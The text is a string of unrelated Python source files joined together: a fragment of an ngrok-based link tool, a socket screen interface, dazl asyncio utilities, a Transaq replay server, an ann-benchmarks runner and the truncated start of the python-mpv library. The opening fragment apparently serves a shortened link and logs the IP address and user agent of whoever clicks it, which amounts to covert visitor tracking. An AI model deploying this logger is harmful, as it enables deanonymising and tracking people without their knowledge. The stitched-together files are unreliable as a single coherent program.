date, ip,
useragent)
print(info)
if args.output_file:
log.write(info)
log.close()
c += 1
def verifyconnection():
global save
while True:
try:
r = requests.get("http://127.0.0.1:4040/api/tunnels/command_line%20(http)").json()
count = r['metrics']['conns']['count']
if count > save:
save = count
logip()
except:
pass
time.sleep(5)
def startngrok():
try:
if platform.system() == "Windows":
os.system("start {} http {}".format(args.ngrok_path, args.port))
else:
os.system("{} http {} > /dev/null &".format(args.ngrok_path, args.port))
print("[ ... ] Starting ngrok [ ... ] \n")
time.sleep(3)
r = requests.get('http://127.0.0.1:4040/api/tunnels').json()
url = r['tunnels'][0]['public_url'].replace("https://", "http://")
print("[ $ ] Use this url: {} [ you can shorten it ;) ]\n".format(url))
print("[ ! ] Waiting for the click [ ? ]\n")
except:
print("[ # ] Something is wrong.")
quit()
if __name__ == "__main__":
startngrok()
webserv = Thread(target=redirect)
webserv.start()
verifyconnection()
|
screen_interface.py
|
import threading
from rich import print as pr
import sys
import socket
import enum
import os
class TypeMessage(enum.Enum):
PRINT="[print]"
INPUT="[input]"
BASE ="[basic]"
CLOSE="[close]"
class Screen:
def __init__(self, prt: int) -> None:
self.port = prt
self.accept_input = False
def connect(self):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def getin():
resp = input(">>> ")
client.send(resp.encode())
try:
client.connect(("127.0.0.1", self.port))
client.send(str(os.getpid()).encode())
while 1:
res = client.recv(1024).decode().rstrip("\x00")
typ, msg = res[:len(TypeMessage.BASE.value)], res[len(TypeMessage.BASE.value):]
if len(msg)>0 and msg != "ping":
pr(msg)
if typ == TypeMessage.CLOSE.value:
client.close()
sys.exit(0)
elif typ == TypeMessage.INPUT.value:
threading.Thread(target=getin).start()
except:
sys.exit(-1)
if len(sys.argv) > 1:
try:
port = int(sys.argv[1])
scrn = Screen(port)
scrn.connect()
except:
sys.exit(-1)
|
asyncio_util.py
|
# Copyright (c) 2017-2021 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
"""
This module contains utilities to help work with ``asyncio``.
"""
from asyncio import (
AbstractEventLoop,
AbstractEventLoopPolicy,
CancelledError,
Future,
InvalidStateError,
Queue as AQueue,
ensure_future,
gather,
get_event_loop,
new_event_loop,
)
from dataclasses import dataclass
from functools import partial, wraps
from inspect import isawaitable, iscoroutinefunction
from queue import Queue
import sys
import threading
from typing import (
Any,
Awaitable,
Callable,
Generator,
Generic,
Iterable,
List,
Optional,
Sequence,
Tuple,
TypeVar,
Union,
cast,
no_type_check,
)
import warnings
from .. import LOG
from ..prim.datetime import TimeDeltaLike, to_timedelta
T = TypeVar("T")
T_co = TypeVar("T_co", covariant=True)
U = TypeVar("U")
_PENDING = "PENDING"
_CANCELLED = "CANCELLED"
_FINISHED = "FINISHED"
def non_reentrant(async_fn):
if not iscoroutinefunction(async_fn):
raise ValueError("expected a coroutine function")
calls = []
@wraps(async_fn)
async def _wrap(*args, **kwargs):
if not calls:
calls.append(None)
try:
return await async_fn(*args, **kwargs)
finally:
calls.pop()
else:
raise InvalidStateError("calls to %r cannot be re-entrant", async_fn)
return _wrap
def isolated_async(async_fn):
"""
Wrap an async function in a thread with its own event loop.
This function runs by itself in an event loop created specifically for this object on its own thread.
This function can be used as a decorator to convert an ``async def`` method to a simple method that blocks while
executing the method on a background thread.
:param async_fn:
The ``async`` function to invoke.
:return:
A function that, when invoked, passes its parameters to the underlying function on a background thread in an
isolated event loop.
"""
queue = Queue()
@wraps(async_fn)
def invoke(*args, **kwargs):
"""
Invoke the wrapped ``async`` method on a background thread, passing in the specified
arguments, and returning the value that the wrapped method returns, or raises an Exception
if the ``async`` function throws.
:param args: The positional arguments to pass.
:param kwargs: The keyword arguments to pass.
:return: The value from the ``async`` function.
"""
thread = threading.Thread(target=partial(_main, args, kwargs))
thread.start()
thread.join()
result, typ, value, traceback = queue.get()
if typ is not None:
# if we have exception information, then an exception was thrown; rethrow it
raise typ(value).with_traceback(traceback)
else:
# we don't have an exception, so assume the result is what we need to pass back
return result
def _main(args, kwargs):
try:
loop = new_event_loop()
result = loop.run_until_complete(async_fn(*args, **kwargs))
loop.close()
queue.put_nowait((result, None, None, None))
except:
typ, value, traceback = sys.exc_info()
queue.put_nowait((None, typ, value, traceback))
return invoke
def await_then(awaitable: "Awaitable[T_co]", func: "Callable[[T_co], U]") -> "Awaitable[U]":
"""
Call a function on the result of an Awaitable, and then return an Awaitable that is resolved
with that result.
If the Awaitable is already "done", then the function is invoked immediately with the result
of that Awaitable and an immediately-completed Future is returned with the result of that
callback.
If either the Awaitable or the function throws an exception, that is returned as a failed
Future. If the Awaitable is cancelled, the returned Future is also cancelled.
:param awaitable:
:param func:
:return:
"""
try:
fut = ensure_future(awaitable)
except TypeError:
raise TypeError(f"expected a valid awaitable (got {awaitable} instead)")
if fut.done():
if fut.cancelled() or fut.exception() is not None:
return fut # type: ignore
else:
try:
return completed(func(fut.result()))
except Exception as ex:
fut = get_event_loop().create_future() # type: ignore
fut.set_exception(ex)
return fut # type: ignore
else:
g = get_event_loop().create_future()
def _propagate(_):
if fut.cancelled():
g.cancel()
elif fut.exception() is not None:
g.set_exception(fut.exception())
else:
try:
g.set_result(func(fut.result()))
except Exception as ex2:
g.set_exception(ex2)
fut.add_done_callback(_propagate)
return g # type: ignore
@dataclass
class FailedInvocation:
"""Marker used within execute_in_loop to propagate exceptions thrown
by coro_fn through the result queue in a way that can be easily detected
by the queue's reader.
"""
ex: Exception
def execute_in_loop(
loop: AbstractEventLoop,
coro_fn: "Callable[[], Union[Awaitable[T_co], T_co]]",
timeout: "Optional[TimeDeltaLike]" = 30.0,
) -> T_co:
"""
Run a coroutine in a target loop. Exceptions thrown by the coroutine are
propagated to the caller. Must NOT be called from a coroutine on the same
loop!
:param loop:
:param coro_fn:
:param timeout: Seconds to wait for the termination of the coroutine.
:return: The return value from the coroutine.
"""
from functools import wraps
from queue import Queue
q = Queue() # type: ignore
def coro_fn_complete(fut):
LOG.debug("coro_fn_complete: %s", fut)
if fut.exception() is None:
q.put_nowait(fut.result())
else:
q.put_nowait(FailedInvocation(fut.exception()))
@wraps(coro_fn)
def run():
if iscoroutinefunction(coro_fn):
fut = ensure_future(coro_fn())
fut.add_done_callback(lambda _: coro_fn_complete(fut))
elif isawaitable(coro_fn):
fut = ensure_future(coro_fn)
fut.add_done_callback(lambda _: coro_fn_complete(fut))
elif callable(coro_fn):
result = coro_fn()
if isawaitable(result):
fut = ensure_future(result)
fut.add_done_callback(lambda _: coro_fn_complete(fut))
else:
q.put_nowait(result)
else:
raise ValueError("Received an unknown kind of callback")
loop.call_soon_threadsafe(run)
timeout_in_seconds = to_timedelta(timeout).total_seconds()
result = q.get(timeout=timeout_in_seconds)
if isinstance(result, FailedInvocation):
raise result.ex
return result
def completed(value, loop=None) -> Future:
if loop is None:
loop = get_event_loop()
fut = loop.create_future()
fut.set_result(value)
return fut
def failed(exception: BaseException, loop=None) -> Future:
if loop is None:
loop = get_event_loop()
fut = loop.create_future()
fut.set_exception(exception)
return fut
def propagate(from_: Future, to: Future) -> None:
"""
Copy the value that ``from_`` is completed with to ``to``, whenever ``from_`` is completed.
"""
if from_.done():
copy_result(from_, to)
else:
from_.add_done_callback(lambda _: copy_result(from_, to))
def copy_result(from_: Future, to: Future) -> None:
if not from_.done():
raise ValueError("from_ must be a completed Future")
if to.done():
raise ValueError("to must NOT be a completed Future")
if from_.cancelled():
to.cancel()
else:
exception = from_.exception()
if exception is not None:
to.set_exception(exception)
else:
result = from_.result()
to.set_result(result)
def to_coroutine(callback: Callable[..., Any]) -> Callable[..., Future]:
"""
Wrap a function or a coroutine, always producing a coroutine.
In other words, for a function like
```
def double(x):
return x + x
```
the result of ``to_coroutine(double)`` would be a function that is equivalent to:
```
async def double(x):
return x + x
```
For functions that are already coroutines, their behavior is unaffected by the wrapper generated
from this function.
:param callback:
The callback to convert to a coroutine.
:return:
A coroutine that calls the specified function.
"""
if not callable(callback):
raise ValueError("callback must be callable")
@wraps(callback)
def invoke_sync(*args, **kwargs) -> Future:
loop = get_event_loop()
try:
result = callback(*args, **kwargs)
if isinstance(result, Future):
return result
else:
future = loop.create_future()
future.set_result(result)
return future
except Exception as ex:
future = loop.create_future()
future.set_exception(ex)
return future
if iscoroutinefunction(callback):
return lambda *args, **kwargs: ensure_future(callback(*args, **kwargs))
else:
return invoke_sync
class LongRunningAwaitable:
"""
An :class:`Awaitable` that "finishes" once all of the futures that have been added to it are
finished.
"""
def __init__(self, awaitables: Optional[Iterable[Awaitable[Any]]] = None):
self._fut = get_event_loop().create_future()
self._coros = [] # type: List[Awaitable[Any]]
if awaitables is not None:
self.extend(awaitables)
def append(self, *awaitables: Awaitable[Any]) -> None:
self.extend(awaitables)
def extend(self, awaitables: Iterable[Awaitable[Any]]):
for a in awaitables:
f = ensure_future(a)
f.add_done_callback(self._future_finished)
self._coros.append(f)
def _future_finished(self, fut):
self._coros.remove(fut)
if not self._coros:
self._fut.set_result(None)
def __await__(self):
return self._fut.__await__()
class ServiceQueue(Generic[T]):
# noinspection PyDeprecation
def __init__(self):
warnings.warn(
"ServiceQueue is deprecated; there is no planned replacement",
DeprecationWarning,
stacklevel=2,
)
self._q = [] # type: Union[List[Tuple[T, Future]], AQueue[Tuple[T, Future]]]
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self._service_fut = safe_create_future()
self._prev_fut = None
# noinspection PyDeprecation
def put(self, value: T) -> Awaitable[None]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
fut = safe_create_future()
if isinstance(self._q, list):
self._q.append((value, fut))
else:
self._q.put_nowait((value, fut))
return fut
def start(self) -> None:
"""
Allow open asynchronous iterators to begin reading data from the queue. Calling this method
more than once has no effect.
"""
if not self._service_fut.done():
existing_items = cast(list, self._q) # type: List[Tuple[T, Future]]
self._q = AQueue()
for item in existing_items:
self._q.put_nowait(item)
self._service_fut.set_result(None)
def stop(self):
if not self._service_fut.done():
raise RuntimeError("Cannot stop an unstarted ServiceQueue")
loop = get_event_loop()
fut = loop.create_future()
self._q.put_nowait((None, fut))
return fut
def abort(self) -> Sequence[T_co]:
"""
Gracefully terminate the open iterator as quickly as possible and return all remaining
elements in the queue.
"""
async def next(self) -> Optional[T_co]:
if not self._service_fut.done():
await self._service_fut
if self._prev_fut is not None:
self._prev_fut.set_result(None)
self._prev_fut = None
q = cast(AQueue, self._q) # type: AQueue[Tuple[T_co, Future]]
value, fut = await q.get()
if value is None:
fut.set_result(None)
return None
else:
self._prev_fut = fut
return value
def __aiter__(self):
return self
async def __anext__(self):
value = await self.next()
if value is not None:
return value
else:
raise StopAsyncIteration
def __bool__(self):
return len(self) > 0
def __len__(self):
if isinstance(self._q, list):
return len(self._q)
else:
return self._q.qsize()
def __repr__(self):
return repr(self._q)
class ContextFreeFuture(Awaitable[T_co]):
"""
An awaitable whose loop is defined at the time of either a :meth:`set_result` call or an
`await`. These futures are more expensive than normal asyncio futures because they are
thread-safe.
"""
_result: Optional[T_co] = None
_exception: Optional[Exception] = None
_log_traceback = False
_asyncio_future_blocking = False
def __init__(self, *, loop: Optional[AbstractEventLoop] = None):
"""
Initialize the future.
The optional ``loop`` argument allows explicitly setting the event loop object used by the
future. Unlike :class:`Future`, If it is not provided, the future does NOT have a loop set,
and it is assigned at the time that :class:`set_result` or an `await` expression is called,
or when :class:`set_loop` is explicitly called.
You may want to provide a loop ahead of time if you know it, and you're really only
utilizing this class for its thread-safe nature.
:param loop: An optional loop to assign to the :class:`ContextFreeFuture`.
"""
if loop is not None and not isinstance(loop, AbstractEventLoop):
raise ValueError("The provided loop must be a valid event loop")
from threading import RLock
self._lock = RLock()
self._callbacks = [] # type: List[Callable[[ContextFreeFuture[T_co]], None]]
self._state = _PENDING
self.__loop = loop # type: Optional[AbstractEventLoop]
self._source_traceback = None
@property
def _loop(self):
"""
Return the current loop.
Because many functions in the asyncio library directly attempt to access the loop of a
Future for validation purposes, it is necessary for this property to behave in strange ways.
If this property is accessed in a context where this is a currently running loop, this
Future will adopt the current running loop as its own, but ONLY if a loop has not yet been
set. This will usually do the right thing, but in some cases it may be necessary for callers
to invoke :meth:`set_loop` directly.
"""
if self.__loop is None:
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
# noinspection PyDeprecation
self.__loop = get_running_loop()
return self.__loop
def set_loop(self, loop: AbstractEventLoop) -> None:
"""
Set the loop affinity for this future.
It is an error to call this function more than once with different values for the loop.
:param loop:
"""
with self._lock:
if self.__loop is None:
self.__loop = loop
elif self.__loop is not loop:
raise InvalidStateError("This future is already associated with a specific loop.")
def cancel(self) -> bool:
"""
Cancel this future.
:return:
"""
with self._lock:
self._log_traceback = False
if self._state != _PENDING:
return False
self._state = _CANCELLED
self._schedule_callbacks()
return True
def set_result(self, result):
"""Mark the future done and set its result.
If the future is already done when this method is called, raises
InvalidStateError.
"""
with self._lock:
if self._state != _PENDING:
raise InvalidStateError("{}: {!r}".format(self._state, self))
self._result = result
self._state = _FINISHED
self._schedule_callbacks()
def set_exception(self, exception):
"""Mark the future done and set an exception.
If the future is already done when this method is called, raises
InvalidStateError.
"""
with self._lock:
if self._state != _PENDING:
raise InvalidStateError("{}: {!r}".format(self._state, self))
if isinstance(exception, type):
exception = exception()
if type(exception) is StopIteration:
raise TypeError(
"StopIteration interacts badly with generators "
"and cannot be raised into a Future"
)
self._exception = exception
self._state = _FINISHED
self._schedule_callbacks()
self._log_traceback = True
def add_done_callback(
self, fn: "Callable[[ContextFreeFuture[T_co]], None]", context=None
) -> None:
if context is not None:
# This used to be a warning, but in newer versions of Python a context
# is sometimes supplied and nothing seems to particularly go wrong by
# simply doing nothing with this information.
pass
with self._lock:
if self._loop is not None and self._state != _PENDING:
self._loop.call_soon_threadsafe(fn, self)
else:
self._callbacks.append(fn)
def _schedule_callbacks(self):
with self._lock:
if self.__loop is None:
self.__loop = get_event_loop()
# clear out the callbacks list and prevent further additions
local_callbacks = self._callbacks
self._callbacks = ()
for fn in local_callbacks:
self.__loop.call_soon_threadsafe(fn, self)
def cancelled(self):
"""Return True if the future was cancelled."""
with self._lock:
return self._state == _CANCELLED
# Don't implement running(); see http://bugs.python.org/issue18699
def done(self):
"""Return True if the future is done.
Done means either that a result / exception are available, or that the
future was cancelled.
"""
with self._lock:
return self._state != _PENDING
def result(self):
"""Return the result this future represents.
If the future has been cancelled, raises CancelledError. If the
future's result isn't yet available, raises InvalidStateError. If
the future is done and has an exception set, this exception is raised.
"""
with self._lock:
if self._state == _CANCELLED:
raise CancelledError
if self._state != _FINISHED:
raise InvalidStateError("Result is not ready.")
self._log_traceback = False
if self._exception is not None:
raise self._exception
return self._result
def exception(self):
"""Return the exception that was set on this future.
The exception (or None if no exception was set) is returned only if
the future is done. If the future has been cancelled, raises
CancelledError. If the future isn't done yet, raises
InvalidStateError.
"""
with self._lock:
if self._state == _CANCELLED:
raise CancelledError
if self._state != _FINISHED:
raise InvalidStateError("Exception is not set.")
self._log_traceback = False
return self._exception
def __await__(self) -> Generator[Any, None, T_co]:
if not self.done():
self._asyncio_future_blocking = True
yield self # This tells Task to wait for completion.
assert self.done(), "yield from wasn't used with future"
return self.result() # May raise too.
class DeferredStartTask:
"""
A :class:`Task`-like object that delays starting its coroutine until the :meth:`start` method is
called.
"""
_asyncio_future_blocking = False
def __init__(self, cb: Callable[[], Future], start=False, name=None):
if not callable(cb):
raise ValueError("cb must be callable")
if start:
self._future = cb()
self._callback = None
else:
self._future = get_event_loop().create_future()
self._callback = cb
# This is required to be compatible with the interface of a Future.
self._loop = self._future._loop
self._name = name or repr(cb)
def start(self) -> None:
"""
Actually invoke the underlying function (but only if it hasn't been invoked already).
"""
cb = self._callback
if cb is not None:
self._callback = None
propagate(from_=ensure_future(cb()), to=self._future)
def started(self) -> bool:
return self._callback is None
def cancelled(self) -> bool:
return self._future.cancelled()
def cancel(self) -> bool:
self._callback = None
return self._future.cancel()
def result(self) -> Any:
return self._future.result()
def done(self) -> bool:
return self._future.done()
def exception(self) -> Optional[BaseException]:
return self._future.exception()
def add_done_callback(self, callback: "Callable[[Future], Any]", context=None) -> None:
if context is None:
self._future.add_done_callback(callback)
else:
self._future.add_done_callback(callback, context=context) # type: ignore
def __await__(self):
return self._future.__await__()
def __repr__(self):
state = self._future._state if self.started() else "NOT_STARTED"
return f"DeferredStartTask({self._name!r}, state={state})"
@no_type_check
def get_running_loop() -> Optional[AbstractEventLoop]:
warnings.warn(
"get_running_loop() is deprecated, as support for Python 3.6 will be dropped in dazl 8. "
"Use Python 3.7+'s asyncio.get_running_loop() instead.",
DeprecationWarning,
)
try:
from asyncio import get_running_loop
try:
return get_running_loop()
except RuntimeError:
return None
except ImportError:
# noinspection PyProtectedMember
from asyncio import _get_running_loop
return _get_running_loop()
# noinspection PyDeprecation
def safe_create_future():
warnings.warn(
"safe_create_future() is deprecated; there is no planned replacement.",
DeprecationWarning,
stacklevel=2,
)
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
loop = get_running_loop()
return loop.create_future() if loop is not None else ContextFreeFuture()
@no_type_check
def named_gather(name: str, *awaitables, return_exceptions=False):
g = gather(*awaitables, return_exceptions=return_exceptions)
g.__repr__ = staticmethod(lambda _: f"<Gather {name}>")
return g
class Signal:
"""
A simple guard that "wakes" up a coroutine from another coroutine.
"""
# noinspection PyDeprecation
def __init__(self):
warnings.warn(
"Signal is deprecated; there is no planned replacement",
DeprecationWarning,
stacklevel=2,
)
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self._fut = safe_create_future()
def notify_all(self) -> None:
"""
Schedule a notification to all coroutines that are `wait`ing.
"""
if self._fut is not None:
self._fut.set_result(None)
self._fut = None
# noinspection PyDeprecation
def wait(self) -> "Awaitable[None]":
if self._fut is None:
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self._fut = safe_create_future()
return self._fut
class UnsettableEventLoopPolicy(AbstractEventLoopPolicy):
def get_event_loop(self) -> AbstractEventLoop:
raise Exception("Called get_event_loop")
def set_event_loop(self, loop: Optional[AbstractEventLoop]) -> None:
raise Exception("Called set_event_loop")
def new_event_loop(self) -> AbstractEventLoop:
raise Exception("Called new_event_loop")
def get_child_watcher(self) -> Any:
raise Exception("get_child_watcher")
def set_child_watcher(self, watcher: Any) -> None:
raise Exception("set_child_watcher")
|
TransaqReplayServer.py
|
# -*- coding: utf-8 -*-
"""
File: TransaqReplayServer.py
Author: Daniil Dolbilov
Created: 18-Oct-2020
"""
import logging
import threading
import time
from multiprocessing.connection import Listener
class TransaqReplayServer:
def __init__(self, xdf_file, host='localhost', port=7070, authkey=b'secret phrase'):
self.xdf_file = xdf_file
self.xdf_encoding = 'windows-1251'
self.skip_list = ['<pits>', '<securities>', '<sec_info_upd>']
self.host = host
self.port = port
self.authkey = authkey
def run_server(self):
logging.info('server: listen [%s:%s]...' % (self.host, self.port))
with Listener((self.host, self.port), authkey=self.authkey) as listener:
logging.info('server: listen started')
while True:
conn = listener.accept()
logging.info('server: client accepted [%s]' % conn._handle)
c_thread = threading.Thread(target=self.client_thread, args=(conn, ))
c_thread.start()
def client_thread(self, conn):
self.replay_events(conn)
logging.info('server: close [%s]' % conn._handle)
conn.close()
def replay_events(self, conn):
with open(self.xdf_file, mode='r', encoding=self.xdf_encoding) as f:
for line in f:
# === FORMAT SAMPLE ===
# 140551.705448 [4804] [0360] <cmd> [V] System version 6.06. TXmlConnector version 2.20.25
# 140551.718466 [4804] [0360] <cmd> [I] <command id="connect"><login> ...
# 140552.720939 [4804] [0360] <res> [R] <result success="true"/>
# 140553.019380 [4804] [clbk] <info> [O] [830u] <markets> ...
# 140553.353871 [4804] [clbk] <info> [O] [150770u] <securities><security secid="0" active="true"> ...
# 140605.644962 [4804] [clbk] <info> [O] [333u] <sec_info_upd><secid>29244</secid><seccode>BR55BJ0</seccode> ...
# 140605.645964 [4804] [clbk] <info> [O] [338u] <sec_info_upd><secid>29245</secid><seccode>BR55BV0</seccode> ...
# 140624.969489 [4804] [clbk] <info> [O] [4304u] <orders><order transactionid="195726"> ...
# 140624.973494 [4804] [clbk] <info> [O] [3540u] <trades><trade><secid>41824</secid> ...
# 140624.980504 [4804] [clbk] <info> [O] [6139u] <positions><forts_position><client> ...
# 140643.576875 [4804] [clbk] <info> [O] [861u] <quotations><quotation secid="32518"><board>FUT</board><seccode>SiZ0</seccode><last>78508</last><quantity>12</quantity> ...
# 140643.676021 [4804] [clbk] <info> [O] [862u] <quotations><quotation secid="32518"><board>FUT</board><seccode>SiZ0</seccode><last>78509</last><quantity>1</quantity> ...
ss = line.split(' ')
if len(ss) < 7 or ss[4] != '[O]':
logging.warning('SKIP: %s' % line.strip())
continue
header = ' '.join(ss[0:6])
xml_msg = line[len(header) + 1:].strip()
if xml_msg.startswith(tuple(self.skip_list)):
continue
# TODO: emulate pause between events (historical)
time.sleep(0.5)
msg_trimmed = xml_msg[:50] # data is very long, just log some chunk
if conn:
logging.debug('[%s] send: %s ...' % (conn._handle, msg_trimmed))
conn.send(xml_msg)
else:
logging.debug('no_conn: %s ...' % msg_trimmed)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)-8s [%(name)s] %(message)s')
xdf_file = '../logs/2020.10.16-140551/20201016_xdf.log'
replayer = TransaqReplayServer(xdf_file)
replayer.run_server()
|
runner.py
|
import argparse
import datetime
import colors
import docker
import json
import multiprocessing
import numpy
import os
import psutil
import requests
import sys
import threading
import time
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.algorithms.definitions import (Definition,
instantiate_algorithm,
get_algorithm_name)
from ann_benchmarks.distance import metrics, dataset_transform
from ann_benchmarks.results import store_results
def run_individual_query(algo, X_train, X_test, distance, count, run_count,
batch):
prepared_queries = \
(batch and hasattr(algo, "prepare_batch_query")) or \
((not batch) and hasattr(algo, "prepare_query"))
best_search_time = float('inf')
for i in range(run_count):
print('Run %d/%d...' % (i + 1, run_count))
# a bit dumb but can't be a scalar since of Python's scoping rules
n_items_processed = [0]
def single_query(v):
if prepared_queries:
algo.prepare_query(v, count)
start = time.time()
algo.run_prepared_query()
total = (time.time() - start)
candidates = algo.get_prepared_query_results()
else:
start = time.time()
candidates = algo.query(v, count)
total = (time.time() - start)
return (total, v, candidates)
def batch_query(X):
if prepared_queries:
algo.prepare_batch_query(X, count)
start = time.time()
algo.run_batch_query()
total = (time.time() - start)
else:
start = time.time()
algo.batch_query(X, count)
total = (time.time() - start)
results = algo.get_batch_results()
candidates = [[(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa
for idx in single_results]
for v, single_results in zip(X, results)]
return [(total / float(len(X)), v) for v in candidates]
def get_candidates(result):
total, v, ids = result
candidates = [(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa
for idx in ids]
n_items_processed[0] += 1
if n_items_processed[0] % 1000 == 0:
print('Processed %d/%d queries...' %
(n_items_processed[0], len(X_test)))
if len(candidates) > count:
print('warning: algorithm %s returned %d results, but count'
' is only %d)' % (algo, len(candidates), count))
return (total, candidates)
if batch:
results = batch_query(X_test)
handle_time = 0
else:
query_list = [single_query(x) for x in X_test]
handle_time, handled_list = algo.handle_query_list_result(query_list)
results = [get_candidates(l) for l in handled_list]
total_time = sum(time for time, _ in results) + handle_time
total_candidates = sum(len(candidates) for _, candidates in results)
search_time = total_time / len(X_test)
avg_candidates = total_candidates / len(X_test)
best_search_time = min(best_search_time, search_time)
verbose = hasattr(algo, "query_verbose")
attrs = {
"batch_mode": batch,
"best_search_time": best_search_time,
"candidates": avg_candidates,
"expect_extra": verbose,
"name": str(algo),
"run_count": run_count,
"distance": distance,
"count": int(count)
}
additional = algo.get_additional()
for k in additional:
attrs[k] = additional[k]
return (attrs, results)
def run(definition, dataset, count, run_count, batch):
algo = instantiate_algorithm(definition)
assert not definition.query_argument_groups \
or hasattr(algo, "set_query_arguments"), """\
error: query argument groups have been specified for %s.%s(%s), but the \
algorithm instantiated from it does not implement the set_query_arguments \
function""" % (definition.module, definition.constructor, definition.arguments)
D = get_dataset(dataset)
X_train = numpy.array(D['train'])
X_test = numpy.array(D['test'])
distance = D.attrs['distance']
print('got a train set of size (%d * %d)' % X_train.shape)
print('got %d queries' % len(X_test))
X_train = dataset_transform[distance](X_train)
X_test = dataset_transform[distance](X_test)
try:
prepared_queries = False
if hasattr(algo, "supports_prepared_queries"):
prepared_queries = algo.supports_prepared_queries()
t0 = time.time()
memory_usage_before = algo.get_memory_usage()
algo.fit(X_train)
build_time = time.time() - t0
index_size = algo.get_memory_usage() - memory_usage_before
print('Built index in', build_time)
print('Index size: ', index_size)
query_argument_groups = definition.query_argument_groups
# Make sure that algorithms with no query argument groups still get run
# once by providing them with a single, empty, harmless group
if not query_argument_groups:
query_argument_groups = [[]]
for pos, query_arguments in enumerate(query_argument_groups, 1):
print("Running query argument group %d of %d..." %
(pos, len(query_argument_groups)))
if query_arguments:
algo.set_query_arguments(*query_arguments)
descriptor, results = run_individual_query(
algo, X_train, X_test, distance, count, run_count, batch)
descriptor["build_time"] = build_time
descriptor["index_size"] = index_size
descriptor["algo"] = get_algorithm_name(
definition.algorithm, batch)
descriptor["dataset"] = dataset
store_results(dataset, count, definition,
query_arguments, descriptor, results, batch)
finally:
algo.done()
def run_from_cmdline():
parser = argparse.ArgumentParser()
parser.add_argument(
'--dataset',
choices=DATASETS.keys(),
required=True)
parser.add_argument(
'--algorithm',
required=True)
parser.add_argument(
'--module',
required=True)
parser.add_argument(
'--constructor',
required=True)
parser.add_argument(
'--count',
required=True,
type=int)
parser.add_argument(
'--runs',
required=True,
type=int)
parser.add_argument(
'--batch',
action='store_true')
parser.add_argument(
'build')
parser.add_argument(
'queries',
nargs='*',
default=[])
args = parser.parse_args()
algo_args = json.loads(args.build)
query_args = [json.loads(q) for q in args.queries]
definition = Definition(
algorithm=args.algorithm,
docker_tag=None, # not needed
module=args.module,
constructor=args.constructor,
arguments=algo_args,
query_argument_groups=query_args,
disabled=False
)
run(definition, args.dataset, args.count, args.runs, args.batch)
def run_docker(definition, dataset, count, runs, timeout, batch, cpu_limit,
mem_limit=None):
cmd = ['--dataset', dataset,
'--algorithm', definition.algorithm,
'--module', definition.module,
'--constructor', definition.constructor,
'--runs', str(runs),
'--count', str(count)]
if batch:
cmd += ['--batch']
cmd.append(json.dumps(definition.arguments))
cmd += [json.dumps(qag) for qag in definition.query_argument_groups]
print('Running command', cmd)
client = docker.from_env()
if mem_limit is None:
mem_limit = psutil.virtual_memory().available
print('Memory limit:', mem_limit)
if batch:
cpu_limit = "0-%d" % (multiprocessing.cpu_count() - 1)
print('Running on CPUs:', cpu_limit)
container = client.containers.run(
definition.docker_tag,
cmd,
volumes={
os.path.abspath('ann_benchmarks'):
{'bind': '/home/app/ann_benchmarks', 'mode': 'ro'},
os.path.abspath('data'):
{'bind': '/home/app/data', 'mode': 'ro'},
os.path.abspath('results'):
{'bind': '/home/app/results', 'mode': 'rw'},
},
cpuset_cpus=cpu_limit,
mem_limit=mem_limit,
detach=True)
def stream_logs():
for line in container.logs(stream=True):
print(colors.color(line.decode().rstrip(), fg='blue'))
if sys.version_info >= (3, 0):
t = threading.Thread(target=stream_logs, daemon=True)
else:
t = threading.Thread(target=stream_logs)
t.daemon = True
t.start()
try:
exit_code = container.wait(timeout=timeout)
# Exit if exit code
if exit_code == 0:
return
elif exit_code is not None:
print(colors.color(container.logs().decode(), fg='red'))
raise Exception('Child process raised exception %d' % exit_code)
finally:
container.remove(force=True)
|
mpv.py
|
# -*- coding: utf-8 -*-
# vim: ts=4 sw=4 et
#
# Python MPV library module
# Copyright (C) 2017-2020 Sebastian Götte <code@jaseg.net>
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
from ctypes import *
import ctypes.util
import threading
import os
import sys
from warnings import warn
from functools import partial, wraps
from contextlib import contextmanager
import collections
import re
import traceback
if os.name == 'nt':
dll = ctypes.util.find_library('mpv-1.dll')
if dll is None:
raise OSError('Cannot find mpv-1.dll in your system %PATH%. One way to deal with this is to ship mpv-1.dll '
'with your script and put the directory your script is in into %PATH% before "import mpv": '
'os.environ["PATH"] = os.path.dirname(__file__) + os.pathsep + os.environ["PATH"] '
'If mpv-1.dll is located elsewhere, you can add that path to os.environ["PATH"].')
backend = CDLL(dll)
fs_enc = 'utf-8'
else:
import locale
lc, enc = locale.getlocale(locale.LC_NUMERIC)
# libmpv requires LC_NUMERIC to be set to "C". Since messing with global variables everyone else relies upon is
# still better than segfaulting, we are setting LC_NUMERIC to "C".
locale.setlocale(locale.LC_NUMERIC, 'C')
sofile = ctypes.util.find_library('mpv')
if sofile is None:
raise OSError("Cannot find libmpv in the usual places. Depending on your distro, you may try installing an "
"mpv-devel or mpv-libs package. If you have libmpv around but this script can't find it, consult "
"the documentation for ctypes.util.find_library which this script uses to look up the library "
"filename.")
backend = CDLL(sofile)
fs_enc = sys.getfilesystemencoding()
class ShutdownError(SystemError):
pass
class MpvHandle(c_void_p):
pass
class MpvRenderCtxHandle(c_void_p):
pass
class MpvOpenGLCbContext(c_void_p):
pass
class PropertyUnavailableError(AttributeError):
pass
class ErrorCode(object):
"""For documentation on these, see mpv's libmpv/client.h."""
SUCCESS = 0
